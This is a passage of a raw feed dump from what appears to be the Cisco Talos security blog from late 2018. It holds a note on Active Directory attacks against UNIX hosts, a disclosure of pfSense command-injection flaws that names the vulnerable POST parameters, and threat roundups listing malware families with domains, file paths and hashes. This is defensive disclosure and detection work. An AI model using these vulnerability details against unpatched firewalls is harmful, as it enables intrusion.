href="https://1.bp.blogspot.com/-Pft9TboCGSQ/XAquLugd4sI/AAAAAAAABQ0/RHusgzQNJIou6p6yeL3UhgZrA7uijOCMwCLcBGAs/s1600/7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://1.bp.blogspot.com/-Pft9TboCGSQ/XAquLugd4sI/AAAAAAAABQ0/RHusgzQNJIou6p6yeL3UhgZrA7uijOCMwCLcBGAs/s640/7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602_umbrella.png" width="640" /></a></div><b><br /></b><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-S9X5-HfoIHM/XAquRXTq2iI/AAAAAAAABQ4/gWJY6B1GPM8U4DSlSyS2KNgX77Pt16T_ACLcBGAs/s1600/7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://2.bp.blogspot.com/-S9X5-HfoIHM/XAquRXTq2iI/AAAAAAAABQ4/gWJY6B1GPM8U4DSlSyS2KNgX77Pt16T_ACLcBGAs/s640/7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602_malware.png" width="640" /></a></div><b><br /></b><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/mSGJhY1Js_0" height="1" width="1" alt=""/>2018-12-13T14:17:23.243-05:000https://blog.talosintelligence.com/2018/12/threat-roundup-1130-1207.htmlAn introduction to offensive capabilities of Active Directory on UNIXhttp://feedproxy.google.com/~r/feedburner/Talos/~3/tL_yyAz8BX0/PortcullisActiveDirectory.htmlActive DirectoryBlack HatBlue TeamPortcullisnoreply@blogger.com (Joe Marshall)Tue, 04 Dec 2018 08:21:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-1664675579510275690Tim Wadhwa-Brown of <a href="https://labs.portcullis.co.uk/">Portcullis Labs</a> authored this post.<br /><br />In preparation for our <a href="https://www.blackhat.com/eu-18/briefings/schedule/index.html#where-2-worlds-collide-bringing-mimikatz-et-al-to-unix-12962">talk</a> at Black Hat Europe, <a href="https://www.cisco.com/c/en/us/products/security/advisory-services.html">Security Advisory EMEAR</a> would like to share the background on our recent research into some common Active Directory integration solutions. Just as with Windows, these solutions can be utilized to join UNIX infrastructure to enterprises' Active Directory forests.<br /><br /><br /><a name='more'></a><br /><h2>Background to active directory integration solutions</h2><br />Having seen an uptick in unique UNIX infrastructures that are integrated into customers' existing Active Directory forests, the question becomes, "Does this present any concerns that may not be well understood?" This quickly became "What if an adversary could get into a UNIX box and then breach your domain?"<br /><br />Within a typical Active Directory integration solution (in this case <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/5.7_release_notes/sssd">SSSD</a>), the solution shares a striking similarity to what a user might see on Windows. Notably, you have:<br /><br /><ul><li>DNS – Used for name resolution</li><li>LDAP – Used for "one-time identification" and assertion of identity</li><li>Kerberos – Used for ongoing authentication</li><li>SSSD – Like LSASS</li><li> PAM – Like msgina.dll or the more modern credential providers</li></ul><br /><br />You can see a breakdown of this process <a href="https://rhelblog.redhat.com/2015/02/04/overview-of-direct-integration-options/">here</a>. Unlike Windows, there is no Group Policy for the most part (with some exceptions), so policies for sudo et al. are typically pushed as flat files to hosts.<br /><br /><h3>Our research</h3><br />Realistically, the threat models associated with each part of the implementation should be quite familiar to anyone securing a heterogeneous Windows network. Having worked with a variety of customers, it becomes apparent that the typical UNIX administrator who does not have a strong background in Windows and Active Directory will be ill-equipped to handle this threat. While we've been talking about successful attacks against components such as LSASS and Kerberos for quite some time, Mimikatz dates back to at least April 2014, and dumping hashes has been around even longer. Pwdump, which dumped local Windows hashes, was published by Jeremy Allison in 1997). However, no one has really taken a concerted look at whether these attacks are possible on UNIX infrastructure, nor how a blue team might spot an adversary performing them.<br /><br />As a result of this research, we were able to develop tactics, tools, and procedures that might further assist an attacker in breaching an enterprise, and we began documenting and developing appropriate strategies to allow blue teams to appropriately detect and respond to such incursions. The presentation and tactics, tools, and procedures for this talk will be available after our <a href="https://www.blackhat.com/eu-18/briefings/schedule/index.html#where-2-worlds-collide-bringing-mimikatz-et-al-to-unix-12962">Blackhat EU talk</a>. They will also be available <a href="https://labs.portcullis.co.uk/">here</a>, and at our <a href="https://github.com/portcullislabs">GitHub</a> <a href="https://github.com/portcullislabs">repo</a>.<br /><br /><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/tL_yyAz8BX0" height="1" width="1" alt=""/>2018-12-04T12:24:07.049-05:000https://blog.talosintelligence.com/2018/12/PortcullisActiveDirectory.htmlVulnerability Spotlight: Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerabilityhttp://feedproxy.google.com/~r/feedburner/Talos/~3/Sn3fPWIDgsk/Netgate-pfsense-command-injection-vulns.htmlcommand injectionNetgatepfSensevuln devvulnerabilitiesVulnerability Discoverynoreply@blogger.com (William Largent)Mon, 03 Dec 2018 11:51:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-6679146764018986375<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/RdpaLkGAweM_HuitA0db1BPT-aOrYM_mwCEwYBhgL/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://2.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/RdpaLkGAweM_HuitA0db1BPT-aOrYM_mwCEwYBhgL/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" /></a></div><i></i><br /><div class="separator" style="clear: both; text-align: center;"></div><i>Brandon Stultz of Cisco Talos discovered these vulnerabilities.</i><br /><h2 style="text-align: left;"><br /></h2><h2 style="text-align: left;">Executive summary</h2>Today, Cisco Talos is disclosing a command injection vulnerability in Netgate pfSense system_advanced_misc.php powerd_normal_mode.&nbsp;pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.<br /><br />In accordance with our coordinated disclosure policy, Cisco Talos worked with Netgate to ensure that these issues are resolved and that an update is available for affected customers.<br /><br /><a name='more'></a><br /><h2 style="text-align: left;">Vulnerability details</h2><b>Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4019)</b><br /><br /><div>This command injection vulnerability in Netgate pfSense is due to lack of sanitization on the 'powerd_normal_mode' parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_normal_mode' POST parameter.&nbsp;</div><div><br /></div>For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0690">here</a>.<br /><br /><br /><b>Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4020)</b><br /><b><br /></b> A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization on the 'powerd_ac_mode'parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_ac_mode' POST parameter.<br /><b><br /></b> For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0690">here</a>.<br /><br /><b>Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4021)&nbsp;</b><br /><b><br /></b> A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization on the powerd_battery_mode', parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_battery_mode' POST parameter.<br /><b><br /></b> For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0690">here</a>.<br /><br /><h2 style="text-align: left;">Conclusion</h2><div>Cisco Talso tested and confirmed that Netgate pfSense CE 2.4.4-RELEASE is affected by these vulnerabilities.</div><h2 style="text-align: left;">Coverage</h2><a href="https://www.pfsense.org/security/advisories/pfSense-SA-18_09.webgui.asc" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="251" data-original-width="1250" height="40" src="https://4.bp.blogspot.com/-88IoUK8efak/W_QN7sl_GMI/AAAAAAAAEp0/WAMOgXu72FIyWFHnvNVTBV6WQSjRMdm5ACLcBGAs/s200/patch_availability_available.jpg" width="200" /></a><br />The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: 48178<br /><div><br /></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/Sn3fPWIDgsk" height="1" width="1" alt=""/>2018-12-13T15:50:00.718-05:000https://blog.talosintelligence.com/2018/12/Netgate-pfsense-command-injection-vulns.htmlThreat Roundup for Nov. 23 to Nov. 30http://feedproxy.google.com/~r/feedburner/Talos/~3/671plxFAmfc/threat-roundup-1123-1130.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 30 Nov 2018 12:33:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-5597344513767261773<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/K9l7ZEQxwTg8BM2N31Dod0MkCgwURbqVQCEwYBhgL/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://4.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/K9l7ZEQxwTg8BM2N31Dod0MkCgwURbqVQCEwYBhgL/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br /></div>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 23 and Nov. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.<br /><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Doc.Malware.Donoff-6759556-0</b><br /> Malware<br /> Donoff is a malicious Microsoft Office document that leverages the Windows Command shell to launch PowerShell and download and execute an executable. <br />&nbsp;</li><li><b>Doc.Malware.00536d-6758981-0</b><br /> Malware<br /> Doc.Malware.00536d is the denomination of a set of malicious documents that leverage VBA and PowerShell to install malware on the system. These documents usually convince the user to enable macros that, if executed, will download and install additional malware on the system.<br />&nbsp;</li><li><b>Xls.Dropper.Donoff-6758223-0</b><br /> Dropper<br /> Donoff is a payload delivery Office document that leverages the Windows Command shell to launch PowerShell to download and execute an executable. <br />&nbsp;</li><li><b>Win.Trojan.Emotet-6758832-0</b><br /> Trojan<br /> Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails, and saw a resurgence recently during Black Friday.<br />&nbsp;</li><li><b>Doc.Malware.Valyria-6757519-0</b><br /> Malware<br /> Valyria is a malicious Microsoft Word document family that is used to distribute other malware. This campaign is currently spreading Emotet.<br />&nbsp;</li><li><b>Win.Virus.Triusor-6757540-0</b><br /> Virus<br /> Triusor is a highly polymorphic malware family. All the binaries are packed and obfuscated to hinder the static analysis. The malware contains code that complicates the dynamic analysis. Once it is executed, the samples perform code injection.<br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Doc.Malware.Donoff-6759556-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>3ek6[.]top</li><li>pvy1[.]top</li><li>di29[.]top</li><li>68d4[.]top</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\sDweD.exe</li><li>%LocalAppData%\Temp\22dughsl.5qd.ps1</li><li>%LocalAppData%\Temp\4s5lt2th.dfc.psm1</li><li>%LocalAppData%\Temp\4e5cllpa.loj.psm1</li><li>%LocalAppData%\Temp\zbaj2qbd.fvr.ps1</li></ul><b>File Hashes</b><br /><ul><li>043a80eab9723a815096c7338c14105011f90c8fe1fe86a02c7c763726cfaa2a</li><li>06aa7214d492067f4f6a8aa0a910b5b32aee7734e0525a471bb2ca111ee6f3d0</li><li>09d47ec5acae65e60e8316435d57e75b8a0153458f4471c8ff3510ee2a809558</li><li>0a12a0000a78dfa623f71b0274df5b54f14dea7ddfe0799ad09cd76db2340441</li><li>0a137fefbe8edc0652e9eb4c6a9694a199d758241c5d2e5da98351771372d8f0</li><li>0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533</li><li>0bdaed255c30cbce8a62153de694ffb80ede08f38ffd48706e415d457a21cbc1</li><li>0e12bab4d0a4c65141c6d16cc8401efda84373a667dfdca21f56b61466ef9e7d</li><li>0fe0f094572df903940dd8394c4c5c307705bb4146c794e77793f74a1e873327</li><li>121c49ab3eccc4472a13766f874b489b025ef1d5d9e1f8243085cb07290177c6</li><li>1459d9df5d2117263b051339baa35d5c28f54f5db6261135ea3d55c90e0985f7</li><li>16fa280526ab5a33bf77f4f86ffcf2a0b54c0733e26a2e070e724981927d1ad8</li><li>1792e52f31de940e6d233967b62bd6712deae048fc110ba38cea000314781c16</li><li>19badf1bbaa2ba68db14bf76e88b11a29492fb8d0cf180b83736a55d23a402be</li><li>1b409f2f2146c2318580c73d5eaeafbdd79e39d4d4f3e5862323b3b6f4a6c916</li><li>1cb58e56ae9f1a563e4789ee947f3941b90c5221f68ea0506da345fb63805826</li><li>1f312a61244c970d254c24055b714138835b839f1da36b9ee1cfc1acf636fbf1</li><li>24d62b3de48bf8b55b79fafcd17bf4a2cb8489a86358b26aa361193ad355dee4</li><li>25fbacf14f3ea9918aa054f040c6cc73edb9450a34e2fe739b131d9c155e3e3d</li><li>2696e57e2daac38a37ca382f979f1e4c61b20f516dd18ba33290fd00ef3eec7e</li><li>29de1616d80266c566605928b266a43dc9e1cb7c1a1ed9c95e32d54efd4f6696</li><li>2af5928b3dfeaeff2556b7fbf27ef564c0a67457ef2ec6ac41dcfdb214b84856</li><li>2caaf8bad60e3e663993727b5ff26d685fb511892f90939d04e5f92765154687</li><li>2eab620737103e94f0dcd33163071e8c0bd1cdaaf42c1d2e254d3e5e71851b24</li><li>33d98771535a91ad332f2e59969b9f51a2bf811dbe886208e139e456cd124631</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-dyXCKeeEQQM/XAGOLN3taZI/AAAAAAAABMI/wbVShm0jyYEuA2ltRgojwzB2ca7AYbbDACLcBGAs/s1600/16fa280526ab5a33bf77f4f86ffcf2a0b54c0733e26a2e070e724981927d1ad8_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-dyXCKeeEQQM/XAGOLN3taZI/AAAAAAAABMI/wbVShm0jyYEuA2ltRgojwzB2ca7AYbbDACLcBGAs/s400/16fa280526ab5a33bf77f4f86ffcf2a0b54c0733e26a2e070e724981927d1ad8_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-GRTO9qlJoq8/XAGOXwoYMQI/AAAAAAAABMM/Btxl0cohWREBHbXcd9dMAq2Ur0Jw6Z4XwCLcBGAs/s1600/0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://4.bp.blogspot.com/-GRTO9qlJoq8/XAGOXwoYMQI/AAAAAAAABMM/Btxl0cohWREBHbXcd9dMAq2Ur0Jw6Z4XwCLcBGAs/s640/0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-RZMjwmi3JSo/XAGOiH9A6UI/AAAAAAAABMU/r_D-DFbg1pEYkjJGbI6s-s-OjD_81u2BQCLcBGAs/s1600/09d47ec5acae65e60e8316435d57e75b8a0153458f4471c8ff3510ee2a809558_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-RZMjwmi3JSo/XAGOiH9A6UI/AAAAAAAABMU/r_D-DFbg1pEYkjJGbI6s-s-OjD_81u2BQCLcBGAs/s640/09d47ec5acae65e60e8316435d57e75b8a0153458f4471c8ff3510ee2a809558_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-BqUGuNlUAGQ/XAGOskh8avI/AAAAAAAABMc/E124oau0rScdjMqyd0bN1hgPsKf6Wiw1ACLcBGAs/s1600/0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://1.bp.blogspot.com/-BqUGuNlUAGQ/XAGOskh8avI/AAAAAAAABMc/E124oau0rScdjMqyd0bN1hgPsKf6Wiw1ACLcBGAs/s640/0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533_malware.png" width="640" /></a></div><br /><h3>Doc.Malware.00536d-6758981-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>_!SHMSFTHISTORY!_</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>cysioniven[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\ebeqjwi0.znf.ps1</li><li>%LocalAppData%\Temp\xnakv4n3.jj0.psm1</li><li>%LocalAppData%\Temp\glq130qw.p3e.psm1</li><li>%LocalAppData%\Temp\haoyv1sm.xuc.ps1</li><li>%AppData%\900194a4.exe</li></ul><b>File Hashes</b><br /><ul><li>0ef9bfca2a912149f417a562853084d460565bdea22574d5f16d148905162d07</li><li>1de14e103775d466cfe9222ba3305e254dc9e8c1efb4454343ab7ef1368cc91a</li><li>70e0962256b2f98bf5ee698be7805dff03789cecdcac79519d3a0b0f327beef7</li><li>d53aded580b952005cec23cf6e4a79de8775f5fab4ad8d1e715556499d3bd1cf</li><li>dd2b0957848a603fde2abb678f3cd9fd6a271b427c04b16708f13f10be691ab6</li><li>e470428e5c12292e0e6723c22c9b1deefa94ec8d182179118474239db192002d</li><li>e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f</li><li>ecbb1cacd8390963a669b92cdd6a78f3e3dfffa93e794dde7426d4ef2780fab4</li><li>f371a9934b7e07b03d3b8982fa3573b456504bf8a9ad5fc6c86801c8f40aa7cb</li><li>fd4098a016d0a192efaf640c7376ea29272313eaed35d386305a0c87bd092a70</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-1hMhIqEn4Es/Wz-6jETR80I/AAAAAAAAAc8/E5qJe2ICdUc2dhS89EAzcTks1OiNvkVhgCLcBGAs/s320/no-umbrella-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-1hMhIqEn4Es/Wz-6jETR80I/AAAAAAAAAc8/E5qJe2ICdUc2dhS89EAzcTks1OiNvkVhgCLcBGAs/s320/no-umbrella-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-jze2pzkdLuM/XAGO-Tmb0HI/AAAAAAAABMo/48nxBof-tIIElXAO3RU8QJTcgYAMPkzHgCLcBGAs/s1600/e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-jze2pzkdLuM/XAGO-Tmb0HI/AAAAAAAABMo/48nxBof-tIIElXAO3RU8QJTcgYAMPkzHgCLcBGAs/s400/e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ZyXU4bbAdRc/XAGPC2xdm3I/AAAAAAAABMs/LYm3RH-Key0KPQag81JvOZIqnFi6JJMrwCLcBGAs/s1600/e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://1.bp.blogspot.com/-ZyXU4bbAdRc/XAGPC2xdm3I/AAAAAAAABMs/LYm3RH-Key0KPQag81JvOZIqnFi6JJMrwCLcBGAs/s640/e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f_tg.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-sT4g5CnxAeI/XAGPIpbS7cI/AAAAAAAABMw/h443dCFjrhQXSa39CSbAEDd0vTeWZ-FgQCLcBGAs/s1600/dd2b0957848a603fde2abb678f3cd9fd6a271b427c04b16708f13f10be691ab6_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://3.bp.blogspot.com/-sT4g5CnxAeI/XAGPIpbS7cI/AAAAAAAABMw/h443dCFjrhQXSa39CSbAEDd0vTeWZ-FgQCLcBGAs/s640/dd2b0957848a603fde2abb678f3cd9fd6a271b427c04b16708f13f10be691ab6_malware.png" width="640" /></a></div><br /><br /><h3>Xls.Dropper.Donoff-6758223-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>momdopre[.]top</li><li>fileiiiililliliillitte[.]xyz</li></ul><b>Files and or directories created</b><br /><ul><li>%SystemDrive%\Documents and Settings\Administrator\My Documents\rnohht`t.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upd22ef67fa.bat</li><li>%LocalAppData%\Temp\0w4zsktj.rxt.psm1</li><li>%LocalAppData%\Temp\vnug35u0.1pd.ps1</li><li>%LocalAppData%\Temp\cmnt0etf.0lt.psm1</li><li>%LocalAppData%\Temp\l21izk2f.bel.ps1</li></ul><b>File Hashes</b><br /><ul><li>0033f2a32856a043d34d491b0b79a3b1d25fbc084447ae801b94a6f4c8c67eec</li><li>0587d2fd8a94400a1a8f87a59111b4ec53c69ab7e4a50e6a4c7dd6eb7590e0b3</li><li>21df4279e0c9f6df6fb9ac8462e89ec9d2c777a3309dc9b8cf891a5232178800</li><li>405e08a4ab0c60f3ddc24dc4f4998bb654fbfae556163c9b70a2545cb79c4414</li><li>67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded</li><li>6816c39d57cf2008ddd7ff252d97b9eb372c9c70ae9ac1834aee5beb0c24208c</li><li>792436cb281c6704ea7f53f7532e7abdfa1370ecf071cb07fdf690f8f6469013</li><li>7c78d19e0f8fe4420346cf0d0033071bcb5bba18015fab8d3e40dc57a5565c7b</li><li>88ceeeed4a5d23e5c26c74300d2f1cc89376c09057ac848032b45e2777d15b3d</li><li>99b43c4080202b48a2a729ed28dac8e3b98cd837494b2e419d71e7693b0652b8</li><li>9a9d1c1b43c93982eaf304c3c7ecb361bede0ea811c23cddb8b13a39328f0c3c</li><li>9e8fb999bba4c93ae100c02ede01475ddbc2b7db624930574ed76ec5813dd451</li><li>bffbd9caa578af5caa98fcb20e0e5e4f55154e9e2ca256364c1f70538c04c5b9</li><li>d59e75ccdee3f0419fd247372697275fa45f391af8319a4cf1f56df411885805</li><li>dcbdf1859c62728c680ed7267f65b3a425aaed5c79b0f7404ef2e6541150d573</li><li>e723f535550c7c4398bbb29f16e76e7a59b8e314b0d0d602c96cda07da56cc17</li><li>ee5fb50a88b4b4a97bf82258cefc53e5de1bd416ddbdbee363dd9dc269ad867d</li><li>f60827889d806f6864b2af5e5c08c467c1f41b176ae47b51bb3918f5cafa68a9</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-9JKIwaGUO2k/XAGPXNodtbI/AAAAAAAABM8/gxQO1YnlgeMNY3ve32n-WDd2Id0p2h_EACLcBGAs/s1600/67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-9JKIwaGUO2k/XAGPXNodtbI/AAAAAAAABM8/gxQO1YnlgeMNY3ve32n-WDd2Id0p2h_EACLcBGAs/s400/67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-NJETr93wbpo/XAGPbisjB9I/AAAAAAAABNE/uREFVHqD-a4RSZCBgdp4Q28LByMvvbNnQCLcBGAs/s1600/9a9d1c1b43c93982eaf304c3c7ecb361bede0ea811c23cddb8b13a39328f0c3c_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-NJETr93wbpo/XAGPbisjB9I/AAAAAAAABNE/uREFVHqD-a4RSZCBgdp4Q28LByMvvbNnQCLcBGAs/s640/9a9d1c1b43c93982eaf304c3c7ecb361bede0ea811c23cddb8b13a39328f0c3c_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-4B72H8S1-Ls/XAGPhVSQTGI/AAAAAAAABNI/JLKSQdM7Us4ozk-jRsD3M1vrjKlkBBoAwCLcBGAs/s1600/67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://1.bp.blogspot.com/-4B72H8S1-Ls/XAGPhVSQTGI/AAAAAAAABNI/JLKSQdM7Us4ozk-jRsD3M1vrjKlkBBoAwCLcBGAs/s640/67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded_umbrella.png" 